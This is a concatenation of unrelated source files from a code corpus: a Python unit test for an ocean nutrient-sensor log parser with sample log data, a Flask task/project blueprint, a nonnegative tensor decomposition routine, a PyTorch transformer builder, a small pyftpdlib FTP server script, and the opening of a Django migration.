2012/12/13 15:42:34.436 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:42:35.437 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:42:36.438 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:42:37.438 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:42:38.439 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:42:39.440 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:42:40.440 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:42:41.474 [nutnr:DLOGP1]:12/13/2012 15:42:38: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:45:26.795 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:45:46.793 [nutnr:DLOGP1]:Instrument started
2012/12/13 17:51:53.412 [nutnr:DLOGP1]:S
2012/12/13 17:51:53.633 [nutnr:DLOGP1]:O
2012/12/13 17:51:53.862 [nutnr:DLOGP1]:S
2012/12/13 17:51:54.088 [nutnr:DLOGP1]:Y
2012/12/13 17:51:54.312 [nutnr:DLOGP1]:1
2012/12/13 17:51:54.548 [nutnr:DLOGP1]:T
2012/12/13 17:51:54.788 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.011 [nutnr:DLOGP1]:3
2012/12/13 17:51:55.243 [nutnr:DLOGP1]:L
2012/12/13 17:51:55.483 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.702 [nutnr:DLOGP1]:1
2012/12/13 17:51:55.928 [nutnr:DLOGP1]:D
2012/12/13 17:51:56.154 [nutnr:DLOGP1]:Y
2012/12/13 17:51:56.373 [nutnr:DLOGP1]:0
2012/12/13 17:51:56.582 [nutnr:DLOGP1]:Q
2012/12/13 17:51:56.803 [nutnr:DLOGP1]:D
2012/12/13 17:51:57.055 [nutnr:DLOGP1]:O
2012/12/13 17:51:57.308 [nutnr:DLOGP1]:Y
2012/12/13 17:51:57.529 [nutnr:DLOGP1]:5
2012/12/13 17:51:57.738 [nutnr:DLOGP1]:Q
2012/12/13 17:51:57.948 [nutnr:DLOGP1]:Q
2012/12/13 17:51:58.181 [nutnr:DLOGP1]:Y
2012/12/13 17:51:58.659 [nutnr:DLOGP1]:Y
2012/12/13 17:51:59.747 [nutnr:DLOGP1]:2012/12/13 17:51:58
2012/12/13 17:52:00.166 [nutnr:DLOGP1]:Instrument started with initialize
"""
    # Variant of TEST_DATA in which the first science record's timestamp is
    # corrupted (backslashes instead of slashes) and the second record has
    # no timestamp at all; the parser is expected to skip both.
    BAD_TEST_DATA = """
2012/12/13 15:29:20.362 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:30:06.455 [nutnr:DLOGP1]:S
2012/12/13 15:30:06.676 [nutnr:DLOGP1]:O
2012/12/13 15:30:06.905 [nutnr:DLOGP1]:S
2012/12/13 15:30:07.130 [nutnr:DLOGP1]:Y
2012/12/13 15:30:07.355 [nutnr:DLOGP1]:1
2012/12/13 15:30:07.590 [nutnr:DLOGP1]:T
2012/12/13 15:30:07.829 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.052 [nutnr:DLOGP1]:3
2012/12/13 15:30:08.283 [nutnr:DLOGP1]:L
2012/12/13 15:30:08.524 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.743 [nutnr:DLOGP1]:1
2012/12/13 15:30:08.969 [nutnr:DLOGP1]:D
2012/12/13 15:30:09.194 [nutnr:DLOGP1]:Y
2012/12/13 15:30:09.413 [nutnr:DLOGP1]:0
2012/12/13 15:30:09.623 [nutnr:DLOGP1]:Q
2012/12/13 15:30:09.844 [nutnr:DLOGP1]:D
2012/12/13 15:30:10.096 [nutnr:DLOGP1]:O
2012/12/13 15:30:10.349 [nutnr:DLOGP1]:Y
2012/12/13 15:30:10.570 [nutnr:DLOGP1]:5
2012/12/13 15:30:10.779 [nutnr:DLOGP1]:Q
2012/12/13 15:30:10.990 [nutnr:DLOGP1]:Q
2012/12/13 15:30:11.223 [nutnr:DLOGP1]:Y
2012/12/13 15:30:11.703 [nutnr:DLOGP1]:Y
2012/12/13 15:30:12.841 [nutnr:DLOGP1]:2012/12/13 15:30:11
2012/12/13 15:30:13.261 [nutnr:DLOGP1]:Instrument started with initialize
2012/12/13 15:30:19.270 [nutnr:DLOGP1]:onds.
2012/12/13 15:30:20.271 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:30:21.272 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:30:22.272 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:30:23.273 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:30:24.273 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:30:25.274 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:30:26.275 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:30:27.275 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:30:28.309 [nutnr:DLOGP1]:12/13/2012 15:30:26: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:30:59.889 [nutnr:DLOGP1]: ++++++++++ charged
2012/12/13 15:31:00.584 [nutnr:DLOGP1]: ON Spectrometer.
2012/12/13 15:31:01.366 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Spectrometer powered up.
2012/12/13 15:31:01.435 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Turning ON UV light source.
2012/12/13 15:31:06.917 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: UV light source powered up.
2012/12/13 15:31:07.053 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: Data log file is 'DATA\SCH12348.DAT'.
2012\12\13 15:31:08.726 SATNDC0239,2012348,15.518322,0.00,0.00,0.00,0.00,0.000000
SATNLC0239,2012348,15.518666,-5.48,20.38,-31.12,0.59,0.000231
2012/12/13 15:31:11.405 SATNLC0239,2012348,15.519024,-6.38,24.24,-37.41,0.61,0.000191
2012/12/13 15:31:12.720 SATNLC0239,2012348,15.519397,-6.77,24.80,-38.00,0.62,0.000203
2012/12/13 15:42:25.429 [nutnr:DLOGP1]:ISUS will start in 15 seconds.
2012/12/13 15:42:26.430 [nutnr:DLOGP1]:ISUS will start in 14 seconds.
2012/12/13 15:42:27.431 [nutnr:DLOGP1]:ISUS will start in 13 seconds.
2012/12/13 15:42:28.431 [nutnr:DLOGP1]:ISUS will start in 12 seconds.
2012/12/13 15:42:29.432 [nutnr:DLOGP1]:ISUS will start in 11 seconds.
2012/12/13 15:42:30.433 [nutnr:DLOGP1]:ISUS will start in 10 seconds.
2012/12/13 15:42:31.434 [nutnr:DLOGP1]:ISUS will start in 9 seconds.
2012/12/13 15:42:32.435 [nutnr:DLOGP1]:ISUS will start in 8 seconds.
2012/12/13 15:42:33.436 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:42:34.436 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:42:35.437 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:42:36.438 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:42:37.438 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:42:38.439 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:42:39.440 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:42:40.440 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:42:41.474 [nutnr:DLOGP1]:12/13/2012 15:42:38: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:45:26.795 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:45:46.793 [nutnr:DLOGP1]:Instrument started
2012/12/13 17:51:53.412 [nutnr:DLOGP1]:S
2012/12/13 17:51:53.633 [nutnr:DLOGP1]:O
2012/12/13 17:51:53.862 [nutnr:DLOGP1]:S
2012/12/13 17:51:54.088 [nutnr:DLOGP1]:Y
2012/12/13 17:51:54.312 [nutnr:DLOGP1]:1
2012/12/13 17:51:54.548 [nutnr:DLOGP1]:T
2012/12/13 17:51:54.788 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.011 [nutnr:DLOGP1]:3
2012/12/13 17:51:55.243 [nutnr:DLOGP1]:L
2012/12/13 17:51:55.483 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.702 [nutnr:DLOGP1]:1
2012/12/13 17:51:55.928 [nutnr:DLOGP1]:D
2012/12/13 17:51:56.154 [nutnr:DLOGP1]:Y
2012/12/13 17:51:56.373 [nutnr:DLOGP1]:0
2012/12/13 17:51:56.582 [nutnr:DLOGP1]:Q
2012/12/13 17:51:56.803 [nutnr:DLOGP1]:D
2012/12/13 17:51:57.055 [nutnr:DLOGP1]:O
2012/12/13 17:51:57.308 [nutnr:DLOGP1]:Y
2012/12/13 17:51:57.529 [nutnr:DLOGP1]:5
2012/12/13 17:51:57.738 [nutnr:DLOGP1]:Q
2012/12/13 17:51:57.948 [nutnr:DLOGP1]:Q
2012/12/13 17:51:58.181 [nutnr:DLOGP1]:Y
2012/12/13 17:51:58.659 [nutnr:DLOGP1]:Y
2012/12/13 17:51:59.747 [nutnr:DLOGP1]:2012/12/13 17:51:58
2012/12/13 17:52:00.166 [nutnr:DLOGP1]:Instrument started with initialize
"""

    def state_callback(self, pos, file_ingested):
        """ Call back method to watch what comes in via the position callback """
        log.trace("SETTING state_callback_value to " + str(pos))
        self.position_callback_value = pos
        self.file_ingested = file_ingested

    def pub_callback(self, pub):
        """ Call back method to watch what comes in via the publish callback """
        log.trace("SETTING publish_callback_value to " + str(pub))
        self.publish_callback_value = pub

    def setUp(self):
        """Build the parser config, the expected particles and the callback
        capture slots used by every test."""
        ParserUnitTestCase.setUp(self)
        self.config = {
            DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.nutnrb',
            DataSetDriverConfigKeys.PARTICLE_CLASS: 'NutnrbDataParticle'
            }
        # not a DataSourceLocation...its just the parser
        self.position = {StateKey.POSITION: 0}
        # Expected particles, built from the exact science-record lines that
        # appear in the data strings above.
        self.particle_a = NutnrbDataParticle("2012/12/13 15:31:08.726 SATNDC0239,2012348,15.518322,0.00,0.00,0.00,0.00,0.000000\n")
        self.particle_b = NutnrbDataParticle("2012/12/13 15:31:10.065 SATNLC0239,2012348,15.518666,-5.48,20.38,-31.12,0.59,0.000231\n")
        self.particle_c = NutnrbDataParticle("2012/12/13 15:31:11.405 SATNLC0239,2012348,15.519024,-6.38,24.24,-37.41,0.61,0.000191\n")
        self.particle_d = NutnrbDataParticle("2012/12/13 15:31:12.720 SATNLC0239,2012348,15.519397,-6.77,24.80,-38.00,0.62,0.000203\n")
        self.particle_e = NutnrbDataParticle("2012/12/13 15:31:14.041 SATNLC0239,2012348,15.519770,-5.28,18.39,-27.76,0.59,0.000212\n")
        self.particle_z = NutnrbDataParticle("2012/12/13 15:31:20.704 SATNLC0239,2012348,15.521605,-7.52,31.35,-49.03,0.63,0.000240\n")
        self.position_callback_value = None
        self.publish_callback_value = None

    def assert_result(self, result, position, particle):
        """Assert one particle was returned and that parser state and the
        position callback both advanced to `position` (a stream position --
        presumably a byte offset into the data; confirm against the parser)."""
        self.assertEqual(result, [particle])
        self.assertEqual(self.parser._state[StateKey.POSITION], position)
        self.assertEqual(self.position_callback_value[StateKey.POSITION], position)
        self.assert_(isinstance(self.publish_callback_value, list))
        self.assertEqual(self.publish_callback_value[0], particle)

    def test_happy_path(self):
        """
        Test the happy path of operations where the parser takes the input
        and spits out a valid data particle given the stream.
        """
        new_state = {}
        self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
        self.parser = NutnrbParser(self.config, new_state, self.stream_handle,
                                   self.state_callback, self.pub_callback)

        result = self.parser.get_records(1)
        self.assert_result(result, 2458, self.particle_a)
        result = self.parser.get_records(1)
        self.assert_result(result, 2544, self.particle_b)
        result = self.parser.get_records(1)
        self.assert_result(result, 2630, self.particle_c)
        result = self.parser.get_records(1)
        self.assert_result(result, 2716, self.particle_d)

        # no data left, dont move the position
        result = self.parser.get_records(1)
        self.assertEqual(result, [])
        self.assertEqual(self.parser._state[StateKey.POSITION], 2716)
        self.assertEqual(self.position_callback_value[StateKey.POSITION], 2716)
        self.assert_(isinstance(self.publish_callback_value, list))
        self.assertEqual(self.publish_callback_value[0], self.particle_d)

    def test_get_many(self):
        """Ask for two records at once and verify both are returned and both
        are published, with state advanced past the second."""
        new_state = {}
        self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
        self.parser = NutnrbParser(self.config, new_state, self.stream_handle,
                                   self.state_callback, self.pub_callback)

        result = self.parser.get_records(2)
        self.assertEqual(result, [self.particle_a, self.particle_b])
        self.assertEqual(self.parser._state[StateKey.POSITION], 2544)
        self.assertEqual(self.position_callback_value[StateKey.POSITION], 2544)
        self.assertEqual(self.publish_callback_value[0], self.particle_a)
        self.assertEqual(self.publish_callback_value[1], self.particle_b)

    def test_bad_data(self):
        """Corrupted records in BAD_TEST_DATA must be skipped: the first
        particle returned is particle_c, the first well-formed record."""
        # There's a bad sample in the data! Ack! Skip it!
        new_state = {}
        self.stream_handle = StringIO(NutnrbParserUnitTestCase.BAD_TEST_DATA)
        self.parser = NutnrbParser(self.config, new_state, self.stream_handle,
                                   self.state_callback, self.pub_callback)

        result = self.parser.get_records(1)
        self.assert_result(result, 2603, self.particle_c)

    def test_long_stream(self):
        """Pull all eleven science records out of LONG_DATA in one request."""
        new_state = {}
        self.stream_handle = StringIO(NutnrbParserUnitTestCase.LONG_DATA)
        self.parser = NutnrbParser(self.config, new_state, self.stream_handle,
                                   self.state_callback, self.pub_callback)

        result = self.parser.get_records(11)
        self.assertEqual(result[-1], self.particle_z)
        self.assertEqual(self.parser._state[StateKey.POSITION], 3232)
        self.assertEqual(self.position_callback_value[StateKey.POSITION], 3232)
        self.assertEqual(self.publish_callback_value[-1], self.particle_z)

    def test_mid_state_start(self):
        """Start the parser with a non-zero position and verify it resumes
        with the next record after that position (particle_d)."""
        new_state = {StateKey.POSITION:2628}
        self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
        self.parser = NutnrbParser(self.config, new_state, self.stream_handle,
                                   self.state_callback, self.pub_callback)
        result = self.parser.get_records(1)
        self.assert_result(result, 2716, self.particle_d)

    # NOTE(review): mutable default argument -- the same dict object is
    # shared across calls; a None sentinel would be safer.
    def reset_parser(self, state = {}):
        """Rebuild the parser over TEST_DATA with the given starting state."""
        self.state_callback_values = []
        self.publish_callback_values = []
        self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
        self.parser = NutnrbParser(self.config, state, self.stream_handle,
                                   self.state_callback, self.pub_callback)

    def test_set_state(self):
        """Read one record, then set the parser state to just after
        particle_b and verify reading continues at particle_c."""
        new_state = {StateKey.POSITION: 2544}
        self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
        self.parser = NutnrbParser(self.config, self.position, self.stream_handle,
                                   self.state_callback, self.pub_callback)
        result = self.parser.get_records(1)
        self.assert_result(result, 2458, self.particle_a)

        self.reset_parser(new_state)
        self.parser.set_state(new_state) # seek to after particle_b
        result = self.parser.get_records(1)
        #
        # If particles C and D appear, but the position is off
        # it is because you are not consuming newlines in your
        # DATA_REGEX pattern
        #
        self.assert_result(result, 2630, self.particle_c)
        result = self.parser.get_records(1)
        self.assert_result(result, 2716, self.particle_d)
| StarcoderdataPython |
106438 | #!/usr/bin/python
from flask import Blueprint,render_template,request,jsonify
from Models.TerminusModel import db, Projetos as ProjetosModel, Clientes as ClientesModel, Tarefas as TarefasModel
tarefas = Blueprint("tarefas",__name__)
@tarefas.route("/tarefas")
def tarefas_index():
    """List every task: render tarefas.html with all Tarefas rows."""
    # Fix: the model is imported as TarefasModel; the original referenced
    # an undefined lowercase name `tarefasModel`, raising NameError on
    # every request.
    tarefas = db.session.query(TarefasModel).all()
    return render_template("tarefas.html", tarefas=tarefas)
@tarefas.route("/projetos/<id>/tarefas", methods=["POST"])
def salvar_tarefas(id):
    """Create a task from the posted form fields and attach it to project
    `id`, committing both in one transaction; rolls back on any failure."""
    tarefa = TarefasModel()
    try:
        tarefa.titulo = request.form["titulo"]
        tarefa.descricao = request.form["descricao"]
        db.session.add(tarefa)
        projeto = db.session.query(ProjetosModel).filter(ProjetosModel.id == id).first()
        projeto.tarefas.append(tarefa)
        db.session.commit()
        return jsonify({"message": "Tarefa Cadastrada com Sucesso!", "status": 0})
    except Exception as e:
        db.session.rollback()
        return jsonify({"message": "Falhou ao cadastrar tarefa %s" % e, "status": 1})
@tarefas.route("/tarefas/<id>/execucao")
def execucao(id):
    """Render the execution page for task `id`.

    Note: `id` is taken from the route but not passed to the template here.
    """
    return render_template("execucao.html")
@tarefas.route("/tarefas/novo")
def novo_projeto():
    """Render the new-project form with the selectable clients and managers."""
    clientes = db.session.query(ClientesModel).all()
    # NOTE(review): GerentesModel is not among the names imported at the top
    # of this file (only Projetos, Clientes and Tarefas are) -- this line
    # will raise NameError as written; confirm the intended import.
    gerentes = db.session.query(GerentesModel).all()
    return render_template("novo_projeto.html", gerentes=gerentes, clientes=clientes)
@tarefas.route("/tarefas/novo", methods=["POST"])
def salvar_projeto():
    """Persist a new project built from the posted form fields.

    On success the form template is re-rendered with a success message; on
    any failure the transaction is rolled back and the error is reported on
    the same template.
    """
    # Fix: the original instantiated an undefined name `tarefasModel`
    # (twice, the second shadowing the first).  The fields assigned below
    # (nome, cliente_id, gerente_id, objetivo, ...) belong to a project, so
    # the imported ProjetosModel is the intended class.
    projeto = ProjetosModel()
    try:
        projeto.nome = request.form['nome']
        projeto.cliente_id = int(request.form['cliente'])
        projeto.gerente_id = int(request.form['gerente'])
        projeto.objetivo = request.form['objetivo']
        projeto.cenario_atual = request.form['cenario_atual']
        projeto.cenario_proposto = request.form['cenario_proposto']
        projeto.data_inicio = request.form['data_inicio']
        projeto.data_termino = request.form['data_termino']
        projeto.valor = request.form['valor']
        db.session.add(projeto)
        db.session.commit()
        return render_template("novo_projeto.html", message="Projeto salvo com sucesso!", status=0)
    except Exception as e:
        # Roll back the failed transaction (consistent with salvar_tarefas).
        db.session.rollback()
        # print-as-function works on both Python 2 and 3; the original
        # Python-2-only print statement breaks parsing under Python 3.
        print("Deu erro! %s" % e)
        return render_template("novo_projeto.html", message="Falhou ao salvar o projeto! %s" % e, status=1)
| StarcoderdataPython |
8733 | """
Nonnegative CP decomposition by Hierarchical alternating least squares (HALS).
With support for missing data.
"""
import numpy as np
import scipy as sci
from scipy import linalg
from tensortools.operations import unfold, khatri_rao
from tensortools.tensors import KTensor
from tensortools.optimize import FitResult, optim_utils
from .._hals_update import _hals_update
def mncp_hals(X, rank, mask, random_state=None, init='rand', **options):
    """
    Fits nonnegative CP Decomposition using the Hierarchical Alternating Least
    Squares (HALS) Method. Supports missing data.
    Parameters
    ----------
    X : (I_1, ..., I_N) array_like
        A real array with nonnegative entries and ``X.ndim >= 3``.
    rank : integer
        The `rank` sets the number of components to be computed.
    mask : (I_1, ..., I_N) array_like
        A binary tensor with the same shape as ``X``. All entries equal to zero
        correspond to held out or missing data in ``X``. All entries equal to
        one correspond to observed entries in ``X`` and the decomposition is
        fit to these datapoints.
    random_state : integer, RandomState instance or None, optional (default ``None``)
        If integer, random_state is the seed used by the random number generator;
        If RandomState instance, random_state is the random number generator;
        If None, the random number generator is the RandomState instance used by np.random.
    init : str, or KTensor, optional (default ``'rand'``).
        Specifies initial guess for KTensor factor matrices.
        If ``'randn'``, Gaussian random numbers are used to initialize.
        If ``'rand'``, uniform random numbers are used to initialize.
        If KTensor instance, a copy is made to initialize the optimization.
    options : dict, specifying fitting options.
        tol : float, optional (default ``tol=1E-5``)
            Stopping tolerance for reconstruction error.
        max_iter : integer, optional (default ``max_iter = 500``)
            Maximum number of iterations to perform before exiting.
        min_iter : integer, optional (default ``min_iter = 1``)
            Minimum number of iterations to perform before exiting.
        max_time : integer, optional (default ``max_time = np.inf``)
            Maximum computational time before exiting.
        verbose : bool ``{'True', 'False'}``, optional (default ``verbose=True``)
            Display progress.
    Returns
    -------
    result : FitResult instance
        Object which holds the fitted results. It provides the factor matrices
        in form of a KTensor, ``result.factors``.
    Notes
    -----
    This implementation is using the Hierarchical Alternating Least Squares Method.
    References
    ----------
    Cichocki, Andrzej, and <NAME>. "Fast local algorithms for
    large scale nonnegative matrix and tensor factorizations."
    IEICE transactions on fundamentals of electronics, communications and
    computer sciences 92.3: 708-721, 2009.
    Examples
    --------
    """

    # Mask missing elements.  Work on a copy so the caller's X is untouched.
    # NOTE(review): missing entries are initialised to the Frobenius norm of
    # the observed entries -- an unusually large scalar fill; confirm against
    # upstream tensortools whether the mean was intended.
    X = np.copy(X)
    X[~mask] = np.linalg.norm(X[mask])

    # Check inputs.
    optim_utils._check_cpd_inputs(X, rank)

    # Initialize problem.
    # (The normX returned here is immediately recomputed below over the
    # observed entries only.)
    U, normX = optim_utils._get_initial_ktensor(init, X, rank, random_state)
    result = FitResult(U, 'NCP_HALS', **options)

    # Store problem dimensions: norm of the observed data, used to report
    # relative residuals.
    normX = linalg.norm(X[mask].ravel())

    # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    # Iterate the HALS algorithm until convergence or maxiter is reached
    # i)   compute the N gram matrices and multiply
    # ii)  Compute Khatri-Rao product
    # iii) Update component U_1, U_2, ... U_N
    # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    while result.still_optimizing:

        # First, HALS update.
        for n in range(X.ndim):

            # Select all components, but U_n
            components = [U[j] for j in range(X.ndim) if j != n]

            # i) compute the N-1 gram matrices
            grams = sci.multiply.reduce([arr.T.dot(arr) for arr in components])

            # ii)  Compute Khatri-Rao product
            kr = khatri_rao(components)
            p = unfold(X, n).dot(kr)

            # iii) Update component U_n
            _hals_update(U[n], grams, p)

        # Then, update masked elements with the current reconstruction so the
        # next sweep fits the imputed values.
        pred = U.full()
        X[~mask] = pred[~mask]

        # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        # Update the optimization result, checks for convergence.
        # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

        # Compute objective function
        # grams *= U[X.ndim - 1].T.dot(U[X.ndim - 1])
        # obj = np.sqrt( (sci.sum(grams) - 2 * sci.sum(U[X.ndim - 1] * p) + normX**2)) / normX
        resid = X - pred
        result.update(linalg.norm(resid.ravel()) / normX)

    # end optimization loop, return result.
    return result.finalize()
7598 | from xmlrpc.server import MultiPathXMLRPCServer
import torch.nn as nn
import torch.nn.functional as F
import copy
from src.layers.layers import Encoder, EncoderLayer, Decoder, DecoderLayer, PositionwiseFeedForward
from src.layers.preprocessing import Embeddings, PositionalEncoding
from src.layers.attention import MultiHeadedAttention
### Generic EncoderDecoder structure:
class EncoderDecoder(nn.Module):
    """
    A standard Encoder-Decoder architecture: embed and encode the source,
    then decode the embedded target against the encoder memory.
    """
    def __init__(self, encoder, decoder, src_embed, tgt_embed, generator):
        super(EncoderDecoder, self).__init__()
        self.encoder = encoder
        self.decoder = decoder
        self.src_embed = src_embed
        self.tgt_embed = tgt_embed
        self.generator = generator

    def forward(self, src, tgt, src_mask, tgt_mask):
        "Take in and process masked src and target sequences."
        memory = self.encode(src, src_mask)
        return self.decode(memory, src_mask, tgt, tgt_mask)

    def encode(self, src, src_mask):
        # Embed the source tokens, then run the encoder stack.
        return self.encoder(self.src_embed(src), src_mask)

    def decode(self, memory, src_mask, tgt, tgt_mask):
        # Embed the target tokens, then decode against the encoder memory.
        return self.decoder(self.tgt_embed(tgt), memory, src_mask, tgt_mask)
class Generator(nn.Module):
    """Final projection head: map d_model-dimensional states to normalised
    log-probabilities over a vocabulary of size `vocab`."""
    def __init__(self, d_model, vocab):
        super(Generator, self).__init__()
        # Single linear map from model dimension to vocabulary size.
        self.proj = nn.Linear(d_model, vocab)

    def forward(self, x):
        scores = self.proj(x)
        # log_softmax over the vocabulary axis yields log-probs summing to 1.
        return F.log_softmax(scores, dim=-1)
def make_model(src_vocab, tgt_vocab, N=6, d_model=512, d_ff=2048, h=8, dropout=0.1, alpha=0.5):
    """Helper: Construct a model from hyperparameters.

    src_vocab / tgt_vocab: source and target vocabulary sizes.
    N: number of encoder and of decoder layers.
    d_model: model (embedding) dimension; d_ff: feed-forward hidden size.
    h: number of attention heads; dropout: dropout probability.
    alpha: extra parameter forwarded to MultiHeadedAttention.
    """
    c = copy.deepcopy
    attn = MultiHeadedAttention(h, d_model, alpha=alpha)
    ff = PositionwiseFeedForward(d_model, d_ff, dropout)
    position = PositionalEncoding(d_model, dropout)
    model = EncoderDecoder(
        Encoder(EncoderLayer(d_model, c(attn), c(ff), dropout), N),
        Decoder(DecoderLayer(d_model, c(attn), c(attn), c(ff), dropout), N),
        nn.Sequential(Embeddings(d_model, src_vocab), c(position)),
        nn.Sequential(Embeddings(d_model, tgt_vocab), c(position)),
        Generator(d_model, tgt_vocab)
    )

    # This was important from their code.
    # Initialize parameters with Glorot / fan_avg.
    for p in model.parameters():
        if p.dim() > 1:
            # Fix: nn.init.xavier_uniform is deprecated in PyTorch; the
            # in-place variant xavier_uniform_ is the supported spelling.
            nn.init.xavier_uniform_(p)
    return model
if __name__ == '__main__':
    # Smoke test: build a small 2-layer example model and print its structure.
    tmp_model = make_model(10, 10, 2)
    print(tmp_model)
| StarcoderdataPython |
134214 | <reponame>Jumpscale/jumpscale6_core<filename>apps/jsftpserver/jsftpserver.py
#!/usr/bin/env python
# $Id: basic_ftpd.py 1174 2013-02-19 11:25:49Z g.rodola $
# pyftpdlib is released under the MIT license, reproduced below:
# ======================================================================
# Copyright (C) 2007-2013 <NAME>' <<EMAIL>>
#
# All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# ======================================================================
"""A basic FTP server which uses a DummyAuthorizer for managing 'virtual
users', setting a limit for incoming connections.
"""
import os
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
from JumpScale import j
# Register this process with the JumpScale application framework before
# any server setup happens.
j.application.appname = "jsftpserver"
j.application.start()
def main():
    """Run a single-user FTP server rooted at the filesystem root.

    The only account is 'root', authenticated with the JumpScale
    superadmin password and granted the full pyftpdlib permission set.
    Blocks forever serving on port 2111.
    """
    # One fully privileged virtual account; no anonymous access.
    authorizer = DummyAuthorizer()
    ftp_root = "/"
    admin_pw = j.application.config.get("system.superadmin.passwd")
    authorizer.add_user('root', admin_pw, ftp_root, perm='elradfmwM')
    # authorizer.add_anonymous(os.getcwd())

    # Wire the authorizer into the connection handler class.
    handler = FTPHandler
    handler.authorizer = authorizer
    handler.banner = "jsftp."
    # Masquerade address would go here when running behind NAT.
    #handler.masquerade_address = '192.168.3.11'
    handler.passive_ports = range(2112, 2222)

    server = FTPServer(('', 2111), handler)
    # Throttle connections globally and per client address.
    server.max_cons = 256
    server.max_cons_per_ip = 5
    server.serve_forever()
if __name__ == '__main__':
    main()
    # Signal clean shutdown to JumpScale only after the (blocking) server
    # loop returns. Previously j.application.stop() ran unconditionally at
    # module import time, *before* main() was invoked by this guard.
    j.application.stop()
| StarcoderdataPython |
45314 | from Task import Task
from Helper import Cli
class CliExecute(Task):
    """Task that runs a command line via the Cli helper.

    Expects self.params to carry 'Parameters' (the command line) and
    'CWD' (working directory for the command).
    """

    def __init__(self, logMethod, parent, params):
        super().__init__("CLI Execute", parent, params, logMethod, None)

    def Run(self):
        """Execute the configured command in the configured directory."""
        command_line = self.params['Parameters']
        work_dir = self.params['CWD']
        runner = Cli(command_line, work_dir, self.logMethod)
        runner.Execute()
| StarcoderdataPython |
109875 | <reponame>andrewhead/Search-Task-Logger
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-31 20:59
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated Django migration (1.9.6, 2016-05-31).

    Adds the Strategy model, new evidence/likert fields on Question, and
    tightens verbose names on PackagePair/Question. Do not edit by hand:
    the schema state here must match what was recorded when it was applied.
    """

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('form', '0002_auto_20160530_2159'),
    ]

    operations = [
